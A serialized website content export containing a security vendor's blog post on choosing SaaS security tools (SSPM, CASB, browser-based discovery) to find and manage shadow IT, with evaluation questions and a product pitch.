security risks associated with them and give actionable guidance on how to manage the risks.",{"data":293036,"content":293037,"nodeType":178},{},[293038],{"data":293039,"marks":293040,"value":13836,"nodeType":173},{},[],"Understanding Shadow IT and Shadow SaaS",{"items":293043},[293044,293046],{"sys":293045,"name":274157},{"id":274156},{"sys":293047,"name":26133},{"id":26132},{"items":293049},[293050,293721],{"__typename":1528,"sys":293051,"content":293052,"title":282544,"synopsis":282545,"hashTags":118,"publishedDate":282546,"slug":282547,"tagsCollection":293711,"authorsCollection":293717},{"id":281802},{"json":293053},{"nodeType":165,"data":293054,"content":293055},{},[293056,293062,293068,293074,293082,293088,293093,293099,293104,293110,293116,293122,293128,293134,293140,293146,293152,293158,293171,293177,293183,293188,293194,293200,293213,293230,293236,293242,293248,293254,293260,293266,293284,293290,293296,293302,293308,293314,293320,293326,293332,293345,293375,293383,293389,293395,293401,293407,293428,293434,293440,293446,293452,293458,293464,293470,293476,293481,293487,293493,293499,293509,293515,293521,293527,293532,293538,293544,293550,293571,293577,293583,293589,293602,293608,293614,293620,293677,293682,293688,293694,293700,293705],{"nodeType":178,"data":293057,"content":293058},{},[293059],{"nodeType":173,"value":281811,"marks":293060,"data":293061},[],{},{"nodeType":178,"data":293063,"content":293064},{},[293065],{"nodeType":173,"value":280354,"marks":293066,"data":293067},[],{},{"nodeType":178,"data":293069,"content":293070},{},[293071],{"nodeType":173,"value":281824,"marks":293072,"data":293073},[],{},{"nodeType":178,"data":293075,"content":293076},{},[293077],{"nodeType":173,"value":281831,"marks":293078,"data":293081},[293079,293080],{"type":370},{"type":1646},{},{"nodeType":178,"data":293083,"content":293084},{},[293085],{"nodeType":173,"value":281840,"marks":293086,"data":293087},[],{},{"nodeType":312,"data":293089,"content":293092},{"target":293090},{"sys":293091},{"id":280474,"type":317,"linkType":318},[],{"nodeType":178,"data":293094,"content":293095},{},[293096],{"nodeType":173,"value":281852,"marks":293097,"data":293098},[],{},{"nodeType":312,"data":293100,"content":293103},{"target":293101},{"sys":293102},{"id":280624,"type":317,"linkType":318},[],{"nodeType":178,"data":293105,"content":293106},{},[293107],{"nodeType":173,"value":281864,"marks":293108,"data":293109},[],{},{"nodeType":169,"data":293111,"content":293112},{},[293113],{"nodeType":173,"value":281871,"marks":293114,"data":293115},[],{},{"nodeType":178,"data":293117,"content":293118},{},[293119],{"nodeType":173,"value":281878,"marks":293120,"data":293121},[],{},{"nodeType":178,"data":293123,"content":293124},{},[293125],{"nodeType":173,"value":281885,"marks":293126,"data":293127},[],{},{"nodeType":169,"data":293129,"content":293130},{},[293131],{"nodeType":173,"value":281892,"marks":293132,"data":293133},[],{},{"nodeType":235,"data":293135,"content":293136},{},[293137],{"nodeType":173,"value":280712,"marks":293138,"data":293139},[],{},{"nodeType":178,"data":293141,"content":293142},{},[293143],{"nodeType":173,"value":281905,"marks":293144,"data":293145},[],{},{"nodeType":235,"data":293147,"content":293148},{},[293149],{"nodeType":173,"value":281912,"marks":293150,"data":293151},[],{},{"nodeType":178,"data":293153,"content":293154},{},[293155],{"nodeType":173,"value":281919,"marks":293156,"data":293157},[],{},{"nodeType":178,"data":293159,"content":293160},{},[293161,293164,293168],{"nodeType":173,"value":281926,"marks":293162,"data":293163},[],{},{"nodeType":173,"value":281930,"marks":293165,"data":293167},[293166],{"type":1646},{},{"nodeType":173,"value":10557,"marks":293169,"data":293170},[],{},{"nodeType":235,"data":293172,"content":293173},{},[293174],{"nodeType":173,"value":281941,"marks":293175,"data":293176},[],{},{"nodeType":178,"data":293178,"content":293179},{},[293180],{"nodeType":173,"value":281948,"marks":293181,"data":293182},[],{},{"nodeType":312,"data":293184,"content":293187},{"target":293185},{"sys":293186},{"id":280733,"type":317,"linkType":318},[],{"nodeType":235,"data":293189,"content":293190},{},[293191],{"nodeType":173,"value":280739,"marks":293192,"data":293193},[],{},{"nodeType":178,"data":293195,"content":293196},{},[293197],{"nodeType":173,"value":280746,"marks":293198,"data":293199},[],{},{"nodeType":178,"data":293201,"content":293202},{},[293203,293206,293210],{"nodeType":173,"value":281972,"marks":293204,"data":293205},[],{},{"nodeType":173,"value":281976,"marks":293207,"data":293209},[293208],{"type":1646},{},{"nodeType":173,"value":281981,"marks":293211,"data":293212},[],{},{"nodeType":178,"data":293214,"content":293215},{},[293216,293221,293225],{"nodeType":173,"value":281988,"marks":293217,"data":293220},[293218,293219],{"type":370},{"type":1646},{},{"nodeType":173,"value":281994,"marks":293222,"data":293224},[293223],{"type":1646},{},{"nodeType":173,"value":10557,"marks":293226,"data":293229},[293227,293228],{"type":370},{"type":1646},{},{"nodeType":178,"data":293231,"content":293232},{},[293233],{"nodeType":173,"value":282007,"marks":293234,"data":293235},[],{},{"nodeType":235,"data":293237,"content":293238},{},[293239],{"nodeType":173,"value":282014,"marks":293240,"data":293241},[],{},{"nodeType":178,"data":293243,"content":293244},{},[293245],{"nodeType":173,"value":282021,"marks":293246,"data":293247},[],{},{"nodeType":235,"data":293249,"content":293250},{},[293251],{"nodeType":173,"value":282028,"marks":293252,"data":293253},[],{},{"nodeType":178,"data":293255,"content":293256},{},[293257],{"nodeType":173,"value":282035,"marks":293258,"data":293259},[],{},{"nodeType":178,"data":293261,"content":293262},{},[293263],{"nodeType":173,"value":282042,"marks":293264,"data":293265},[],{},{"nodeType":178,"data":293267,"content":293268},{},[293269,293272,293281],{"nodeType":173,"value":282049,"marks":293270,"data":293271},[],{},{"nodeType":1698,"data":293273,"content":293276},{"target":293274},{"sys":293275},{"id":282056,"type":317,"linkType":318},[293277],{"nodeType":173,"value":28052,"marks":293278,"data":293280},[293279],{"type":194},{},{"nodeType":173,"value":197,"marks":293282,"data":293283},[],{},{"nodeType":178,"data":293285,"content":293286},{},[293287],{"nodeType":173,"value":282069,"marks":293288,"data":293289},[],{},{"nodeType":178,"data":293291,"content":293292},{},[293293],{"nodeType":173,"value":282076,"marks":293294,"data":293295},[],{},{"nodeType":169,"data":293297,"content":293298},{},[293299],{"nodeType":173,"value":282083,"marks":293300,"data":293301},[],{},{"nodeType":235,"data":293303,"content":293304},{},[293305],{"nodeType":173,"value":282090,"marks":293306,"data":293307},[],{},{"nodeType":178,"data":293309,"content":293310},{},[293311],{"nodeType":173,"value":282097,"marks":293312,"data":293313},[],{},{"nodeType":178,"data":293315,"content":293316},{},[293317],{"nodeType":173,"value":282104,"marks":293318,"data":293319},[],{},{"nodeType":235,"data":293321,"content":293322},{},[293323],{"nodeType":173,"value":282111,"marks":293324,"data":293325},[],{},{"nodeType":178,"data":293327,"content":293328},{},[293329],{"nodeType":173,"value":282118,"marks":293330,"data":293331},[],{},{"nodeType":178,"data":293333,"content":293334},{},[293335,293338,293342],{"nodeType":173,"value":282125,"marks":293336,"data":293337},[],{},{"nodeType":173,"value":280833,"marks":293339,"data":293341},[293340],{"type":1646},{},{"nodeType":173,"value":280838,"marks":293343,"data":293344},[],{},{"nodeType":250,"data":293346,"content":293347},{},[293348,293357,293366],{"nodeType":254,"data":293349,"content":293350},{},[293351],{"nodeType":178,"data":293352,"content":293353},{},[293354],{"nodeType":173,"value":280851,"marks":293355,"data":293356},[],{},{"nodeType":254,"data":293358,"content":293359},{},[293360],{"nodeType":178,"data":293361,"content":293362},{},[293363],{"nodeType":173,"value":280861,"marks":293364,"data":293365},[],{},{"nodeType":254,"data":293367,"content":293368},{},[293369],{"nodeType":178,"data":293370,"content":293371},{},[293372],{"nodeType":173,"value":280871,"marks":293373,"data":293374},[],{},{"nodeType":178,"data":293376,"content":293377},{},[293378],{"nodeType":173,"value":282169,"marks":293379,"data":293382},[293380,293381],{"type":370},{"type":1646},{},{"nodeType":178,"data":293384,"content":293385},{},[293386],{"nodeType":173,"value":280887,"marks":293387,"data":293388},[],{},{"nodeType":235,"data":293390,"content":293391},{},[293392],{"nodeType":173,"value":282184,"marks":293393,"data":293394},[],{},{"nodeType":178,"data":293396,"content":293397},{},[293398],{"nodeType":173,"value":282191,"marks":293399,"data":293400},[],{},{"nodeType":178,"data":293402,"content":293403},{},[293404],{"nodeType":173,"value":282198,"marks":293405,"data":293406},[],{},{"nodeType":250,"data":293408,"content":293409},{},[293410,293419],{"nodeType":254,"data":293411,"content":293412},{},[293413],{"nodeType":178,"data":293414,"content":293415},{},[293416],{"nodeType":173,"value":282211,"marks":293417,"data":293418},[],{},{"nodeType":254,"data":293420,"content":293421},{},[293422],{"nodeType":178,"data":293423,"content":293424},{},[293425],{"nodeType":173,"value":282221,"marks":293426,"data":293427},[],{},{"nodeType":178,"data":293429,"content":293430},{},[293431],{"nodeType":173,"value":282228,"marks":293432,"data":293433},[],{},{"nodeType":235,"data":293435,"content":293436},{},[293437],{"nodeType":173,"value":282235,"marks":293438,"data":293439},[],{},{"nodeType":178,"data":293441,"content":293442},{},[293443],{"nodeType":173,"value":282242,"marks":293444,"data":293445},[],{},{"nodeType":178,"data":293447,"content":293448},{},[293449],{"nodeType":173,"value":282249,"marks":293450,"data":293451},[],{},{"nodeType":169,"data":293453,"content":293454},{},[293455],{"nodeType":173,"value":282256,"marks":293456,"data":293457},[],{},{"nodeType":235,"data":293459,"content":293460},{},[293461],{"nodeType":173,"value":282263,"marks":293462,"data":293463},[],{},{"nodeType":178,"data":293465,"content":293466},{},[293467],{"nodeType":173,"value":282270,"marks":293468,"data":293469},[],{},{"nodeType":178,"data":293471,"content":293472},{},[293473],{"nodeType":173,"value":282277,"marks":293474,"data":293475},[],{},{"nodeType":312,"data":293477,"content":293480},{"target":293478},{"sys":293479},{"id":280936,"type":317,"linkType":318},[],{"nodeType":235,"data":293482,"content":293483},{},[293484],{"nodeType":173,"value":282289,"marks":293485,"data":293486},[],{},{"nodeType":178,"data":293488,"content":293489},{},[293490],{"nodeType":173,"value":282296,"marks":293491,"data":293492},[],{},{"nodeType":178,"data":293494,"content":293495},{},[293496],{"nodeType":173,"value":282303,"marks":293497,"data":293498},[],{},{"nodeType":178,"data":293500,"content":293501},{},[293502,293505],{"nodeType":173,"value":282310,"marks":293503,"data":293504},[],{},{"nodeType":173,"value":282314,"marks":293506,"data":293508},[293507],{"type":1646},{},{"nodeType":235,"data":293510,"content":293511},{},[293512],{"nodeType":173,"value":282322,"marks":293513,"data":293514},[],{},{"nodeType":178,"data":293516,"content":293517},{},[293518],{"nodeType":173,"value":282329,"marks":293519,"data":293520},[],{},{"nodeType":178,"data":293522,"content":293523},{},[293524],{"nodeType":173,"value":282336,"marks":293525,"data":293526},[],{},{"nodeType":312,"data":293528,"content":293531},{"target":293529},{"sys":293530},{"id":274541,"type":317,"linkType":318},[],{"nodeType":235,"data":293533,"content":293534},{},[293535],{"nodeType":173,"value":282348,"marks":293536,"data":293537},[],{},{"nodeType":178,"data":293539,"content":293540},{},[293541],{"nodeType":173,"value":282355,"marks":293542,"data":293543},[],{},{"nodeType":178,"data":293545,"content":293546},{},[293547],{"nodeType":173,"value":282362,"marks":293548,"data":293549},[],{},{"nodeType":250,"data":293551,"content":293552},{},[293553,293562],{"nodeType":254,"data":293554,"content":293555},{},[293556],{"nodeType":178,"data":293557,"content":293558},{},[293559],{"nodeType":173,"value":282375,"marks":293560,"data":293561},[],{},{"nodeType":254,"data":293563,"content":293564},{},[293565],{"nodeType":178,"data":293566,"content":293567},{},[293568],{"nodeType":173,"value":282385,"marks":293569,"data":293570},[],{},{"nodeType":235,"data":293572,"content":293573},{},[293574],{"nodeType":173,"value":282392,"marks":293575,"data":293576},[],{},{"nodeType":178,"data":293578,"content":293579},{},[293580],{"nodeType":173,"value":282399,"marks":293581,"data":293582},[],{},{"nodeType":178,"data":293584,"content":293585},{},[293586],{"nodeType":173,"value":282406,"marks":293587,"data":293588},[],{},{"nodeType":178,"data":293590,"content":293591},{},[293592,293595,293599],{"nodeType":173,"value":282413,"marks":293593,"data":293594},[],{},{"nodeType":173,"value":236043,"marks":293596,"data":293598},[293597],{"type":370},{},{"nodeType":173,"value":282421,"marks":293600,"data":293601},[],{},{"nodeType":235,"data":293603,"content":293604},{},[293605],{"nodeType":173,"value":282428,"marks":293606,"data":293607},[],{},{"nodeType":178,"data":293609,"content":293610},{},[293611],{"nodeType":173,"value":282435,"marks":293612,"data":293613},[],{},{"nodeType":178,"data":293615,"content":293616},{},[293617],{"nodeType":173,"value":282442,"marks":293618,"data":293619},[],{},{"nodeType":250,"data":293621,"content":293622},{},[293623,293632,293641,293650,293659,293668],{"nodeType":254,"data":293624,"content":293625},{},[293626],{"nodeType":178,"data":293627,"content":293628},{},[293629],{"nodeType":173,"value":273418,"marks":293630,"data":293631},[],{},{"nodeType":254,"data":293633,"content":293634},{},[293635],{"nodeType":178,"data":293636,"content":293637},{},[293638],{"nodeType":173,"value":282464,"marks":293639,"data":293640},[],{},{"nodeType":254,"data":293642,"content":293643},{},[293644],{"nodeType":178,"data":293645,"content":293646},{},[293647],{"nodeType":173,"value":273438,"marks":293648,"data":293649},[],{},{"nodeType":254,"data":293651,"content":293652},{},[293653],{"nodeType":178,"data":293654,"content":293655},{},[293656],{"nodeType":173,"value":282483,"marks":293657,"data":293658},[],{},{"nodeType":254,"data":293660,"content":293661},{},[293662],{"nodeType":178,"data":293663,"content":293664},{},[293665],{"nodeType":173,"value":273458,"marks":293666,"data":293667},[],{},{"nodeType":254,"data":293669,"content":293670},{},[293671],{"nodeType":178,"data":293672,"content":293673},{},[293674],{"nodeType":173,"value":282502,"marks":293675,"data":293676},[],{},{"nodeType":312,"data":293678,"content":293681},{"target":293679},{"sys":293680},{"id":282509,"type":317,"linkType":318},[],{"nodeType":178,"data":293683,"content":293684},{},[293685],{"nodeType":173,"value":282515,"marks":293686,"data":293687},[],{},{"nodeType":235,"data":293689,"content":293690},{},[293691],{"nodeType":173,"value":282522,"marks":293692,"data":293693},[],{},{"nodeType":178,"data":293695,"content":293696},{},[293697],{"nodeType":173,"value":282529,"marks":293698,"data":293699},[],{},{"nodeType":312,"data":293701,"content":293704},{"target":293702},{"sys":293703},{"id":282536,"type":317,"linkType":318},[],{"nodeType":178,"data":293706,"content":293707},{},[293708],{"nodeType":173,"value":37,"marks":293709,"data":293710},[],{},{"items":293712},[293713,293715],{"sys":293714,"name":274157},{"id":274156},{"sys":293716,"name":26133},{"id":26132},{"items":293718},[293719],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":293720},{"url":282559},{"__typename":1528,"sys":293722,"content":293724,"title":294049,"synopsis":294050,"hashTags":118,"publishedDate":294051,"slug":294052,"tagsCollection":294053,"authorsCollection":294059},{"id":293723},"4LOMe7ez5adQtwbPireIBc",{"json":293725},{"data":293726,"content":293727,"nodeType":165},{},[293728,293735,293754,293761,293768,293775,293782,293789,293796,293803,293810,293817,293824,293831,293838,293854,293861,293868,293875,293882,293889,293896,293914,293921,293928,293935,293941,293948,293956,293989,293997,294030],{"data":293729,"content":293730,"nodeType":178},{},[293731],{"data":293732,"marks":293733,"value":293734,"nodeType":173},{},[],"As part of your larger cloud security strategy, you’ve likely been asked to focus on how to secure SaaS apps used in your company. The first step to securing SaaS is getting a real sense of what platforms employees are actually using, beyond those that you already know about. Since SaaS is so easy for employees to adopt and start using without any input from IT and security, they’re likely using hundreds of SaaS apps that aren’t even on your radar. The first step in securing something is getting full visibility into what you even need to secure in the first place. ",{"data":293736,"content":293737,"nodeType":178},{},[293738,293742,293750],{"data":293739,"marks":293740,"value":293741,"nodeType":173},{},[],"To help guide folks through how you might do SaaS discovery on your own, we wrote an ",{"data":293743,"content":293746,"nodeType":1698},{"target":293744},{"sys":293745},{"id":282056,"type":317,"linkType":318},[293747],{"data":293748,"marks":293749,"value":247581,"nodeType":173},{},[],{"data":293751,"marks":293752,"value":293753,"nodeType":173},{},[]," about how to manually find what apps employees are using. In it, we explored how to analyze data that you already have on hand to find the unknown apps (shadow IT) used within your business. That’s a pretty significant manual effort, though, and most security teams don’t have the resources to do it. Plus, while these manual attempts can chip away at the SaaS discovery process, none are great at giving you a comprehensive view of SaaS use, nor do they keep up with the constant influx of apps employees are signing up for daily. ",{"data":293755,"content":293756,"nodeType":178},{},[293757],{"data":293758,"marks":293759,"value":293760,"nodeType":173},{},[],"To get truly broad coverage of what SaaS employees are using, you need a large dataset of SaaS apps, the domains associated with them, and this dataset must constantly be updated and expanded to include new apps that are launched every day. ",{"data":293762,"content":293763,"nodeType":178},{},[293764],{"data":293765,"marks":293766,"value":293767,"nodeType":173},{},[],"Unless you can find such a dataset, you must create it. And creating a constantly updated dataset is no small undertaking. That’s why there are so many off-the-shelf solutions and tools that focus solely on SaaS discovery these days. Many say that they are full-scale SaaS security platforms, but what that means isn’t always clear, even after reading product marketing materials. If you were to look at a venn diagram of “SaaS security platforms,” you’d have a giant mess of interlocking circles, with some shared activities amongst all (or most) tools and then vastly different features from that core functionality.",{"data":293769,"content":293770,"nodeType":178},{},[293771],{"data":293772,"marks":293773,"value":293774,"nodeType":173},{},[],"How “good” they are at SaaS discovery really depends on what data they’re using, what they have access to within your environment, the quality of their proprietary datasets (breadth, depth, and timeliness of that data), and how they work with your existing data and tools. To help navigate this mess, we’re sharing some pros and cons of the categories of commercial tools on the market.",{"data":293776,"content":293777,"nodeType":178},{},[293778],{"data":293779,"marks":293780,"value":293781,"nodeType":173},{},[],"To determine which solution you need, you need to consider your tech stack, your specific needs, your risk tolerance, and your short and long term objectives. In this article, we’ll break down some major use cases and match them up with what solutions make the most sense to address them.",{"data":293783,"content":293784,"nodeType":235},{},[293785],{"data":293786,"marks":293787,"value":293788,"nodeType":173},{},[],"You’re a large enterprise interested in securing core SaaS platforms",{"data":293790,"content":293791,"nodeType":178},{},[293792],{"data":293793,"marks":293794,"value":293795,"nodeType":173},{},[],"\nWorking to only secure 20 or so core applications that have already been sanctioned by the security team? A cloud security posture management (CSPM) or SaaS security posture management (SSPM) solution might be the answer you’re looking for, particularly if you’re on the highest tier license for those apps. ",{"data":293797,"content":293798,"nodeType":178},{},[293799],{"data":293800,"marks":293801,"value":293802,"nodeType":173},{},[],"You can make the most of these tools during in-depth investigations or threat hunting exercises. Leverage them to enforce custom SaaS or cloud app policies as well. The caveat with this one is that you’ll need a fairly sophisticated security team to manage, customize, and run SSPM and CSPM tools.",{"data":293804,"content":293805,"nodeType":178},{},[293806],{"data":293807,"marks":293808,"value":293809,"nodeType":173},{},[],"An ideal environment for these solutions is one that has a full SOC capability so that you extend your existing security monitoring and threat hunting coverage into these core SaaS platforms. You’ll be able to secure a small handful of your business critical applications as long as they’re large and well-established platforms. ",{"data":293811,"content":293812,"nodeType":178},{},[293813],{"data":293814,"marks":293815,"value":293816,"nodeType":173},{},[],"The reason you’ll need top-level licenses and well-established SaaS platforms to make these solutions work is because they rely on API data from those SaaS platforms. Those mature APIs provide necessary information about those core apps that CSPMs and SSPMs use to provide security insights you need to manage the risks. Unfortunately, they won’t cover the dozens of smaller SaaS apps most organizations use, and are normally only available on top license tiers.",{"data":293818,"content":293819,"nodeType":235},{},[293820],{"data":293821,"marks":293822,"value":293823,"nodeType":173},{},[],"You’re a more traditional, on-prem enterprise interested in blocking unsanctioned SaaS",{"data":293825,"content":293826,"nodeType":178},{},[293827],{"data":293828,"marks":293829,"value":293830,"nodeType":173},{},[],"If your environment is traditional on-site internal networks and you have mature gateway monitoring technology in place already, a cloud access security broker (CASB) may be your best path to securing cloud apps. CASBs work best if you have no employees working from home or on the road or you’re forcing employees to only access work platforms and internet browsers through your corporate VPN.",{"data":293832,"content":293833,"nodeType":178},{},[293834],{"data":293835,"marks":293836,"value":293837,"nodeType":173},{},[],"CASBs typically pull network data such as DNS, SASE, VPN, proxy, and firewall logs. They may also require that you install an agent on each employees’ devices if you want coverage when they are out of the office. ",{"data":293839,"content":293840,"nodeType":178},{},[293841,293845,293850],{"data":293842,"marks":293843,"value":293844,"nodeType":173},{},[],"With those data sources, they provide good aggregate information about SaaS platforms that are accessed. What they ",{"data":293846,"marks":293847,"value":293849,"nodeType":173},{},[293848],{"type":1646},"can’t do well",{"data":293851,"marks":293852,"value":293853,"nodeType":173},{},[]," is provide any insight into how the SaaS app is being used, by which employees (you typically get IP addresses not user names), and for what purpose - as an example, they are typically not able to tell the difference between opening a SaaS product’s homepage, or actually logging into the application - so you are going to have a fairly large number of false positives. ",{"data":293855,"content":293856,"nodeType":178},{},[293857],{"data":293858,"marks":293859,"value":293860,"nodeType":173},{},[],"A CASB also really makes sense if you’re forced into complying with strict regulatory requirements to block everything until you’re able to do an in-depth due diligence process on each app. If your goal (or need) is to block access to unknown, unvetted, or unsanctioned SaaS at the network level with no exceptions, a CASB might be for you.",{"data":293862,"content":293863,"nodeType":235},{},[293864],{"data":293865,"marks":293866,"value":293867,"nodeType":173},{},[],"You’re a cloud-native company who wants to enable SaaS without introducing too much risk",{"data":293869,"content":293870,"nodeType":178},{},[293871],{"data":293872,"marks":293873,"value":293874,"nodeType":173},{},[],"For cloud-native companies that need better coverage, and are looking for more nuanced controls than network-level blocking, a solution that discovers and secures SaaS through the browser is the way to go. Since employees access SaaS through their browser, it’s a logical step to collect data about who is using what apps through a browser extension. ",{"data":293876,"content":293877,"nodeType":178},{},[293878],{"data":293879,"marks":293880,"value":293881,"nodeType":173},{},[],"The browser approach lets you do true SaaS discovery - so you can find what employees are actually using (not just accessing) and then go about securing those apps. You also don’t need to do much in terms of managing a browser-based solution once it’s set up. It simply runs in the background and surfaces employee SaaS use data into a dashboard. ",{"data":293883,"content":293884,"nodeType":178},{},[293885],{"data":293886,"marks":293887,"value":293888,"nodeType":173},{},[],"By combining browser-level data and robust security APIs from those core business platforms that SSPMs typically tap into, you can get broad visibility of SaaS use in your company for those large in number, but less mature, more up-and-coming apps, and the depth of security data you need for those few core apps that most employees are using. ",{"data":293890,"content":293891,"nodeType":178},{},[293892],{"data":293893,"marks":293894,"value":293895,"nodeType":173},{},[],"The other key benefit of a browser-based approach for SaaS discovery is that you can get incredibly powerful data about who is using the app, how they’re using it, if they’re using security features such as MFA, if they’re reusing passwords across multiple apps, if they’re sharing passwords, when they’ve used it last, and so on. That data is critical when it comes to securing SaaS because the devil truly is in the details. ",{"data":293897,"content":293898,"nodeType":178},{},[293899,293903,293911],{"data":293900,"marks":293901,"value":293902,"nodeType":173},{},[],"If we’ve piqued your interest and you’re curious to see what we can discover about SaaS in your business, ",{"data":293904,"content":293906,"nodeType":186},{"uri":293905},"https://login.pushsecurity.com/",[293907],{"data":293908,"marks":293909,"value":293910,"nodeType":173},{},[],"try the free browser extension",{"data":293912,"marks":293913,"value":197,"nodeType":173},{},[],{"data":293915,"content":293916,"nodeType":235},{},[293917],{"data":293918,"marks":293919,"value":293920,"nodeType":173},{},[],"Consider their data sources  ",{"data":293922,"content":293923,"nodeType":178},{},[293924],{"data":293925,"marks":293926,"value":293927,"nodeType":173},{},[],"The critical thing to understand when you’re evaluating if a solution will work for you would be understanding what their data sources are, what weaknesses those data sources inherently have, and what aligns best with your goals. We’ve tried to surface some of that information within the use cases in this article.",{"data":293929,"content":293930,"nodeType":178},{},[293931],{"data":293932,"marks":293933,"value":293934,"nodeType":173},{},[],"So if you’re looking at an EDR that says they can discover SaaS usage, they’ll likely be leveraging endpoint data to detect SaaS use. If you’re looking at CASBs that integrate with your proxy, they’re probably looking at network level data – you get the idea.  ",{"data":293936,"content":293937,"nodeType":235},{},[293938],{"data":293939,"marks":293940,"value":40632,"nodeType":173},{},[],{"data":293942,"content":293943,"nodeType":178},{},[293944],{"data":293945,"marks":293946,"value":293947,"nodeType":173},{},[],"To wrap this up, we’re going to summarize some key points and provide some questions to ask yourself, your team, or even the vendor of the solution you’re evaluating, as you consider what combination of efforts or what tool is right for you. ",{"data":293949,"content":293950,"nodeType":178},{},[293951],{"data":293952,"marks":293953,"value":293955,"nodeType":173},{},[293954],{"type":370},"Does this solution provide SaaS discovery?",{"data":293957,"content":293958,"nodeType":250},{},[293959,293969,293979],{"data":293960,"content":293961,"nodeType":254},{},[293962],{"data":293963,"content":293964,"nodeType":178},{},[293965],{"data":293966,"marks":293967,"value":293968,"nodeType":173},{},[],"Will this tool find what SaaS apps employees are using, including those you don’t already know about? If so, how? ",{"data":293970,"content":293971,"nodeType":254},{},[293972],{"data":293973,"content":293974,"nodeType":178},{},[293975],{"data":293976,"marks":293977,"value":293978,"nodeType":173},{},[],"Will the tool be able to differentiate between a user visiting a SaaS website, and actually logging into the app? How will it determine who the user is?",{"data":293980,"content":293981,"nodeType":254},{},[293982],{"data":293983,"content":293984,"nodeType":178},{},[293985],{"data":293986,"marks":293987,"value":293988,"nodeType":173},{},[],"If the tool doesn’t provide you with SaaS discovery (finding Shadow IT and the apps employees are using that aren’t on your radar), how will you deal with those apps employees are using without your knowledge?",{"data":293990,"content":293991,"nodeType":178},{},[293992],{"data":293993,"marks":293994,"value":293996,"nodeType":173},{},[293995],{"type":370},"Does the tool provide enough context so you can manage SaaS risk?",{"data":293998,"content":293999,"nodeType":250},{},[294000,294010,294020],{"data":294001,"content":294002,"nodeType":254},{},[294003],{"data":294004,"content":294005,"nodeType":178},{},[294006],{"data":294007,"marks":294008,"value":294009,"nodeType":173},{},[],"Are you getting context about how your users are using apps (are they logging in with social logins or passwords, do they have MFA enabled, are they admins on the app, etc.), or is it only providing generic information about the app?",{"data":294011,"content":294012,"nodeType":254},{},[294013],{"data":294014,"content":294015,"nodeType":178},{},[294016],{"data":294017,"marks":294018,"value":294019,"nodeType":173},{},[],"How will you engage employees that already rely on these SaaS platforms, or want to adopt new apps, can you handle that though email or in-person - or do you need something more scalable?",{"data":294021,"content":294022,"nodeType":254},{},[294023],{"data":294024,"content":294025,"nodeType":178},{},[294026],{"data":294027,"marks":294028,"value":294029,"nodeType":173},{},[],"Do you need the ability to apply progressive controls, or simply need the ability to block apps entirely?",{"data":294031,"content":294032,"nodeType":178},{},[294033,294037,294045],{"data":294034,"marks":294035,"value":294036,"nodeType":173},{},[],"\nIf you aren’t sure about these questions, why not consider what a ",{"data":294038,"content":294040,"nodeType":186},{"uri":294039},"/product",[294041],{"data":294042,"marks":294043,"value":294044,"nodeType":173},{},[],"user-powered security approach",{"data":294046,"marks":294047,"value":294048,"nodeType":173},{},[]," might look like for your organization.","How to find the right SaaS security solution for your organization ","In this guide, we’ll break down some major SaaS use cases and match them up with solutions that can address them, covering pros and cons for each.\n","2022-07-25T00:00:00.000Z","how-to-find-the-right-saas-security-solution-for-your-organization",{"items":294054},[294055,294057],{"sys":294056,"name":274157},{"id":274156},{"sys":294058,"name":26133},{"id":26132},{"items":294060},[294061],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":294062},{"url":13981},{"items":294064},[294065],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":294066},{"url":273636},{"json":294068,"links":294433},{"nodeType":165,"data":294069,"content":294070},{},[294071,294077,294083,294089,294095,294101,294107,294113,294119,294125,294131,294137,294143,294148,294154,294160,294166,294172,294178,294184,294190,294196,294202,294208,294214,294220,294225,294231,294247,294253,294259,294265,294271,294277,294283,294289,294295,294301,294314,294327,294333,294339,294345,294351,294357,294363,294369,294375,294381,294387,294393,294399,294405,294411,294417],{"nodeType":169,"data":294072,"content":294073},{},[294074],{"nodeType":173,"value":258287,"marks":294075,"data":294076},[],{},{"nodeType":178,"data":294078,"content":294079},{},[294080],{"nodeType":173,"value":287284,"marks":294081,"data":294082},[],{},{"nodeType":178,"data":294084,"content":294085},{},[294086],{"nodeType":173,"value":287291,"marks":294087,"data":294088},[],{},{"nodeType":178,"data":294090,"content":294091},{},[294092],{"nodeType":173,"value":287298,"marks":294093,"data":294094},[],{},{"nodeType":178,"data":294096,"content":294097},{},[294098],{"nodeType":173,"value":287305,"marks":294099,"data":294100},[],{},{"nodeType":169,"data":294102,"content":294103},{},[294104],{"nodeType":173,"value":287312,"marks":294105,"data":294106},[],{},{"nodeType":178,"data":294108,"content":294109},{},[294110],{"nodeType":173,"value":287319,"marks":294111,"data":294112},[],{},{"nodeType":178,"data":294114,"content":294115},{},[294116],{"nodeType":173,"value":287326,"marks":294117,"data":294118},[],{},{"nodeType":169,"data":294120,"content":294121},{},[294122],{"nodeType":173,"value":287333,"marks":294123,"data":294124},[],{},{"nodeType":178,"data":294126,"content":294127},{},[294128],{"nodeType":173,"value":287340,"marks":294129,"data":294130},[],{},{"nodeType":178,"data":294132,"content":294133},{},[294134],{"nodeType":173,"value":287347,"marks":294135,"data":294136},[],{},{"nodeType":169,"data":294138,"content":294139},{},[294140],{"nodeType":173,"value":287354,"marks":294141,"data":294142},[],{},{"nodeType":312,"data":294144,"content":294147},{"target":294145},{"sys":294146},{"id":287361,"type":317,"linkType":318},[],{"nodeType":235,"data":294149,"content":294150},{},[294151],{"nodeType":173,"value":287367,"marks":294152,"data":294153},[],{},{"nodeType":178,"data":294155,"content":294156},{},[294157],{"nodeType":173,"value":287374,"marks":294158,"data":294159},[],{},{"nodeType":178,"data":294161,"content":294162},{},[294163],{"nodeType":173,"value":287381,"marks":294164,"data":294165},[],{},{"nodeType":178,"data":294167,"content":294168},{},[294169],{"nodeType":173,"value":287388,"marks":294170,"data":294171},[],{},{"nodeType":178,"data":294173,"content":294174},{},[294175],{"nodeType":173,"value":287395,"marks":294176,"data":294177},[],{},{"nodeType":235,"data":294179,"content":294180},{},[294181],{"nodeType":173,"value":287402,"marks":294182,"data":294183},[],{},{"nodeType":178,"data":294185,"content":294186},{},[294187],{"nodeType":173,"value":287409,"marks":294188,"data":294189},[],{},{"nodeType":178,"data":294191,"content":294192},{},[294193],{"nodeType":173,"value":287416,"marks":294194,"data":294195},[],{},{"nodeType":178,"data":294197,"content":294198},{},[294199],{"nodeType":173,"value":287423,"marks":294200,"data":294201},[],{},{"nodeType":235,"data":294203,"content":294204},{},[294205],{"nodeType":173,"value":287430,"marks":294206,"data":294207},[],{},{"nodeType":178,"data":294209,"content":2942